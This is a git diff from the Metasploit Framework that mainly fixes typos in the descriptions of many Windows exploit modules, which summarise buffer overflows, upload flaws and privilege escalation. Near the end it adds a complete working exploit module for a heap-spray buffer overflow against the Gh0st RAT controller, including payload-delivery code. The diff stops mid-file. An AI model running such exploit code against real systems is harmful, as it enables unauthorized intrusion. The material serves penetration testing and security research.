Second, it's possible to abuse a directory traversal when uploading files thorough the same component, allowing to upload an arbitrary payload embedded in a JSP. The module has been tested successfully on HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50. diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index c5fe0e7c3e..549a377fdb 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated - file uploads and handling zip contents in a insecure way. Combining both weaknesses + file uploads and handling zip contents in an insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index e13fea3d96..4025f63965 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote 1. An "Accept-Language" header longer than 100 bytes 2. An "OVABverbose" URI variable set to "on", "true" or "1" - The vulnerability is related to "_WebSession::GetWebLocale()" .. + The vulnerability is related to "_WebSession::GetWebLocale()". NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload. }, diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 898d0ca5e7..a9a0fc253c 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote address. The vulnerability is due to the use of the function "_OVConcatPath" which finally - uses "strcat" in a insecure way. User controlled data is concatenated to a string + uses "strcat" in an insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index ddfbf25392..9fd6a6cd2d 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined - with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is + with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 286bec091c..62ba2f732b 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. - The vulnerable code lies within the a function within "snmpviewer.exe" with a + The vulnerable code lies within a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 6839e47c99..97080de852 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works - against a specific build (ie. NNM 7.53_01195) + against a specific build (i.e. NNM 7.53_01195) }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index ee3b876650..f357451095 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the - request size. The buffer being targetted is 16384 bytes in size. There are actually two + request size. The buffer being targeted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the "execvp_nc" function within "ov.dll" prior to diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 8533e86032..175c790ec0 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. - By sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow + By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote like the following: #0 ... - #1 sprintf_new(local_stack_buf, fmt, cooke); + #1 sprintf_new(local_stack_buf, fmt, cookie); #2 OvWwwDebug(" HTTP_COOKIE=%s\n", cookie); #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x); #4 sub_405ee0("nnm", "webappmon"); @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the "OvJavaLocale" cookie being - passed in a request ot "webappmon.exe". Further research shows that several different + passed in a request to "webappmon.exe". Further research shows that several different cookie values, as well as several different CGI applications, can be used. '}, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 9760118941..63d1a92528 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the - com.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system - allowing the execution of arbitary code. + com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system + allowing the execution of arbitrary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0 }, diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index b509c49c96..24f401dc26 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), - which may result aribitrary remote code execution under the context of 'SYSTEM'. + which may result in arbitrary remote code execution under the context of 'SYSTEM'. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 645794b5c6..746a121ef7 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX HTTP server. - By sending an specially crafted HTTP request containing format specifiers, an + By sending a specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index bc3ba93485..f66d395af2 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerable. The administration web page on port 18881 is vulnerable to a remote buffer overflow - attack. By sending an long character string in the password field, both the structured + attack. By sending a long character string in the password field, both the structured exception handler and the saved extended instruction pointer are over written, allowing an attacker to gain control of the application and the underlying operating system remotely. diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 2b08f0b2f8..f7c5ee3a5d 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization - header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and + header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected. }, 'Author' => 'David Maciejak ', diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index fa47aa5c65..ba31ebb651 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account - has a default password of "plugin" which can not be reset through the user interface. By + has a default password of "plugin" which cannot be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows. diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index 76bd9fdf3e..fbfbf9858a 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super( 'Name' => 'ManageEngine Applications Manager Authenticated Code Execution', 'Description' => %q{ - This module logs into the Manage Engine Appplications Manager to upload a + This module logs into the Manage Engine Applications Manager to upload a payload to the file system and a batch script that executes the payload. }, 'Author' => 'Jacob Giannantonio ', 'Platform' => 'win', diff --git a/modules/exploits/windows/http/octopusdeploy_deploy.rb b/modules/exploits/windows/http/octopusdeploy_deploy.rb index e95b94becf..bba2efb29f 100644 --- a/modules/exploits/windows/http/octopusdeploy_deploy.rb +++ b/modules/exploits/windows/http/octopusdeploy_deploy.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Octopus Deploy Authenticated Code Execution', 'Description' => %q{ This module can be used to execute a payload on an Octopus Deploy server given - valid credentials or an API key. The payload is execued as a powershell script step + valid credentials or an API key. The payload is executed as a powershell script step on the Octopus Deploy server during a deployment. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 97eb75ca15..01c368907f 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote root. If a new Domain has been used to deploy the Oracle application, the Windows Management Instrumentation service can be used to execute arbitrary code. - Both techniques has been successfully tested on default installs of Oracle BTM + Both techniques have been successfully tested on default installs of Oracle BTM 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are provided, but the user can configure the traversal depth using the DEPTH option. }, diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index ab0e9270ce..b99da301e1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description' => %q{ This module exploits an authentication bypass vulnerability - in login.php. In conjuction with the authentication bypass issue, + in login.php. In conjunction with the authentication bypass issue, the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0 diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 7adce23a2f..9225f81aea 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt - generally causes a thread to die whether sucessful or not. Therefore, in a default + generally causes a thread to die whether successful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index ca29fef445..a0c48c7bd0 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module can be used to execute a payload on Umbraco CMS 4.7.0.378. The payload is uploaded as an ASPX script by sending a specially crafted - SOAP request to codeEditorSave.asmx, which permits unauthorised file upload + SOAP request to codeEditorSave.asmx, which permits unauthorized file upload via the SaveDLRScript operation. SaveDLRScript is also subject to a path traversal vulnerability, allowing code to be placed into the web-accessible /umbraco/ directory. diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 972f64f4c3..57e7ed96e9 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against - Windows NT 4 Service Packs 3, 4, and 5. The server will + Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 1c9e9173d9..99719ef8e1 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ This module exploits a buffer overflow in the 'DELETE' - command of the the IMail IMAP4D service. This vulnerability + command of the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. }, diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index ec6af0305e..e5a7a49317 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Novell NetMail IMAP STATUS Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS + This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index bc7c633104..48533a760f 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Computer Associates License Client GETCONFIG Overflow', 'Description' => %q{ - This module exploits an vulnerability in the CA License Client + This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index facf89531c..4665dd436d 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ - This module will generate a .NET service executable on the target and utilise + This module will generate a .NET service executable on the target and utilize InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 442c7cfc5e..42dd874d1f 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -22,11 +22,11 @@ class MetasploitModule < Msf::Exploit::Local This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection - technique to drop only the DLL payload binary instead of three seperate + technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting - your payload in a seperate process. + your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 42fbe5dfd3..f195409a4f 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'Windows SYSTEM Escalation via KiTrap0D', 'Description' => %q{ This module will create a new session with SYSTEM privileges via the - KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already + KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. }, diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 33e7621dab..04c5b66dd2 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload - into another SYSTEM process before restoring it's own token to + into another SYSTEM process before restoring its own token to avoid causing system instability. ), 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index d57baf0588..e56aac1e70 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -35,8 +35,8 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing - a malformed font. The vulnerability was exploited by the hacking team and disclosed on - the july data leak. This module has been tested successfully on vulnerable builds of + a malformed font. The vulnerability was exploited by the hacking team and disclosed in + the July data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/ms16_016_webdav.rb b/modules/exploits/windows/local/ms16_016_webdav.rb index c9db432e06..2eca69259a 100644 --- a/modules/exploits/windows/local/ms16_016_webdav.rb +++ b/modules/exploits/windows/local/ms16_016_webdav.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation', 'Description' => %q{ This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn - a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing + a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/panda_psevents.rb b/modules/exploits/windows/local/panda_psevents.rb index bb3bb2c098..02af138582 100644 --- a/modules/exploits/windows/local/panda_psevents.rb +++ b/modules/exploits/windows/local/panda_psevents.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local Vulnerable Products: Panda Global Protection 2016 (<=16.1.2) Panda Antivirus Pro 2016 (<=16.1.2) - Panda Small Busines Protetion (<=16.1.2) + Panda Small Business Protection (<=16.1.2) Panda Internet Security 2016 (<=16.1.2) }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index a590cf92b9..f920dd58c1 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default. - Unless targetting a local user either set the DOMAIN, or specify a UPN user + Unless targeting a local user either set the DOMAIN, or specify a UPN user format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function. A custom command line can be sent instead of uploading an executable. diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 4879a2fcd6..e3ff6051ab 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been - tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. + tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb index bcb068b3c3..bf28f0ed4f 100644 --- a/modules/exploits/windows/local/wmi_persistence.rb +++ b/modules/exploits/windows/local/wmi_persistence.rb @@ -27,8 +27,8 @@ class MetasploitModule < Msf::Exploit::Local The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method - creates an event filter that utilises the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER - before executing the payload. The signal can be sent from a windows host on a LAN utilising the waitfor.exe command + creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER + before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations. diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index c1dd455671..3ff96f380f 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote - adminstration service, an attacker may be able to execute arbitrary + administration service, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index 60cf970353..e38ec9cb95 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't - reliable across virtual (VMWare, VirtualBox) and physical environments. Because of + reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP. }, diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index f9896581b1..479d87bde5 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote command. Additionally the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. - The module uses uses the Windows Management Instrumentation service to execute an + The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2. diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 4207c36860..835342afca 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases - stackpivot allows to execute the ROP chain which ultimately is used to execute + stack pivot allows to execute the ROP chain which ultimately is used to execute VirtualAlloc and bypass DEP. }, 'Author' => 'Spencer McIntyre', diff --git a/modules/exploits/windows/misc/gh0st.rb b/modules/exploits/windows/misc/gh0st.rb new file mode 100644 index 0000000000..f4a8ff1734 --- /dev/null +++ b/modules/exploits/windows/misc/gh0st.rb @@ -0,0 +1,127 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Gh0st Client buffer Overflow', + 'Description' => %q{ + This module exploits a Memory buffer overflow in the Gh0st client (C2 server) + }, + 'Author' => 'Professor Plum', + 'License' => MSF_LICENSE, + 'References' => + [ + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'AllowWin32SEH' => true + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => '', + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed + }, + 'Platform' => 'win', + 'DisclosureDate' => 'Jul 27 2017', + 'Targets' => + [ + ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }] + ], + 'Privileged' => false, + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']), + Opt::RPORT(80) + ] + ) + end + + def make_packet(id, data) + msg = id.chr + data + compressed = Zlib::Deflate.deflate(msg) + datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed + end + + def validate_response(data) + if data.nil? + print_status('Server closed connection') + return false + end + if data.empty? + print_status('No response recieved') + return false + end + if data.size < 13 + print_status('Invalid packet') + print_status(data) + return false + end + mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV') + if mag.index(datastore['MAGIC']) != 0 + print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size]) + return false + end + if pktlen != data.size + print_status('Packet size mismatch') + return false + end + msg = Zlib::Inflate.inflate(data[13..data.size]) + if msg.size != msglen + print_status('Packet decompress failure') + return false + end + return true + end + + def check + connect + sock.put(make_packet(101, "\x00")) # heartbeat + if validate_response(sock.get_once || '') + return Exploit::CheckCode::Appears + end + Exploit::CheckCode::Safe + end + + def exploit + print_status("Trying target #{target.name}") + print_status('Spraying heap...') + for i in 0..100 + connect + sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded)) + if not validate_response(sock.get_once) + disconnect + return + end + end + + for i in 103..107 + print_status("Trying command #{i}...") + begin + connect + sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28) + sock.put(sploit) + if validate_response(sock.get_once) + next + end + sleep(0.1) + break + rescue EOFError + print_status('Invalid') + end + end + handler + disconnect + end +end diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb 